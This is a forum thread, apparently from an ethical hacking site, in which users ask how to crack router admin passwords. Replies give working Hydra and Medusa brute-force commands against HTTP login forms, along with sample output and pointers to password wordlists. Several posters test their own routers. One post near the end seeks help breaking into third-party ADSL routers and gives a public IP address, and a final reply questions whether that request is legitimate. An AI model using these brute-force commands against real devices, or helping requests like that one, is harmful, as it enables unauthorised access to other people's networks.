EH-Net

Hi,
how can i hack a routers password
it's a web form
i get the routers login page when i enter 192.168.1.1
i tried Brutus, but somehow brutus always says timeout.. maybe some1 can help me wid that..

i also included the source code of that page,
i think it uses md5 ecncryption,

i'm not very professional hacker but do my best to keep up.

Please tel me what to do

thx

try hydra

well i have no idea how hydra for win works, since there's no gui.
could u give me some sort of tutorial please?

hydra:
hydra -l admin -p mypass 192.168.0.1 http-get htp://192.168.0.1
hydra -l admin -p mypass 192.168.0.1 http-head htp://192.168.0.1

medusa
cg@segfault:~/evil/bruteforce/ $ medusa -h 192.168.0.1 -u admin -p mypass -M http

Medusa v1.3 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [http] Host: 192.168.0.1 (1/1) User: admin (1/1) Password: mypass (1/1)
ACCOUNT FOUND: [http] Host: 192.168.0.1 User: admin Password: mypass [SUCCESS]

thanks allot man ;),

how can i replace
"mypass" against a brute force attack?
cause its a web form, and shouldnt it be http-post?

you're not even reading the man page are you?


-->http-{get|post}-form

-P password.lst

so is it:

hydra http-form-post 192.168.1.1:user=^user_name^&pass=^passwd1^&mid=failed

or?

hydra -l admin -p -P http-form-post 192.168.1.1:user=^user_name^&pass=^passwd1^&mid=failed


i dont know how to brute force, do i first have to create a brute force word list? and how?

I tried the same command
hydra -l admin -p mypass xx.xx.xxx.xxx http-get htp://xx.xx.xx.xxx

I am finding the error that
child with pid 2948 terminating,cannot connect

can anyone help what the error indicates

Hello,
I have a problem with Medusa, it don't discover my password

root@xxx-desktop:/home/who# medusa -h 192.168.2.1 -u admin -p 1234 -M http
Medusa v1.4 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [http] Host: 192.168.2.1 (1/1) User: admin (1/1) Password: 1234 (1/1)

and it stop....

does your web server use basic authentication?

It use wap.

Thanks

hmmm windows authentication protocol???

I'm working under ubuntu.

hmm i'll rephrase.  what type of webserver are you running and on what OS?

I use windows XP, and i am trying to "hack" my router here at home (Zyxel NBG-415N)

I am using the same commands, but ip is 168.192.2.1

and as password to the router, i get "mypass" by using your command, and when i try to login on the router with that, it is incorrect.

heeelp

thats because "mypass" is an example password.  if you want to test medusa out you need to pass it YOUR password.

try using medusa, its working for me, hydra is not (least on my router at the house)

cg@segfault:~$ medusa -h 192.168.0.1 -p test -u admin -M http
Medusa v1.4 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [http] Host: 192.168.0.1 (1/1) User: admin (1/1) Password: test (1/1)
cg@segfault:~$ medusa -h 192.168.0.1 -p realpass -u admin -M http
Medusa v1.4 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [http] Host: 192.168.0.1 (1/1) User: admin (1/1) Password: realpass (1/1)
ACCOUNT FOUND: [http] Host: 192.168.0.1 User: admin Password: realpass [SUCCESS]

What's your router MODEL?

some POS dlink

I use hydra on windows and I have the following message:

C:\hydra>hydra -l admin -p mypass 192.168.45.252 http-get http://192.168.45.252
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2008-04-16 17:18:30
[DATA] 1 tasks, 1 servers, 1 login tries (l:1/p:1), ~1 tries per task
[DATA] attacking service http-get on port 80
[STATUS] attack finished for 192.168.45.252 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2008-04-16 17:18:31


C:\hydra>hydra -l admin -p mypass 192.168.45.252 http-get http://192.168.45.252
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2008-04-16 17:18:30
[DATA] 1 tasks, 1 servers, 1 login tries (l:1/p:1), ~1 tries per task
[DATA] attacking service http-get on port 80
[STATUS] attack finished for 192.168.45.252 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2008-04-16 17:18:31

I don't understand,no pass I have???

Hello,

     Sorry for posting on such an old post but, I have a similar issue.
I downloaded, "-=Xploitz=- Master Password Collection," which is about 3.55 GB (uncompressed). It's a massive library of "dictionaries" of all kinds.

It also included "useful tools," such as a Dictionary Maker from 1995 (which I use now). I created a massive dictionary (of every possible character combination 1-10 characters long); Now I have no idea if I am doing the command correct or not.

Here's a quick run-over of my "specs":
Router -- LinkSys BEFSR81
Operating System -- Windows XP: Service Pack 2
Internet Explorer version -- 6.0
Cipher Strength 128-bit (from the "about")

To log into the router you go to 192.168.1.1 (to be 100% clear);
I have HYDRA Win32 5.4, I'm comfortable with using consoles, I grew up on DOS.

The command(s) for HYDRA I use are:
hydra -l admin -P words.txt -e ns -f -o OUTPUT.txt -vV 192.168.1.1 http-get /

Is there anything wrong in there? Or something I should change? Also, is there something I could safely (and legally) test HYDRA on to make sure I'm doing this correctly (like TeamSpeak, X-Fire, MySpace)?

can u mail me a link to your dictionaries??? plz

Brought back from the dead... ::)  A 1 post wonder from 3 years ago will probably not respond.  Google password dictionaries....rockyou, thelist, etc..

Check out http://www.skullsecurity.org/wiki/index.php/Passwords

The rockyou list especially has worked really well for me.

hi everyone
i have many ADSL router ip that change their default password
I cant use bruteforce sotware plz help me in  simple way how use this software on windows Xp to get routers passwords.
like this static router ip: http://46.164.123.198/
skapinta_1boy@yahoo.com

http://routerpwn.com/

Check it out. Good stuff!

I'm sorry but it sounds to me, from your post, that you came across a list of devices which are internet accessible, and are trying to break into them. Is that correct?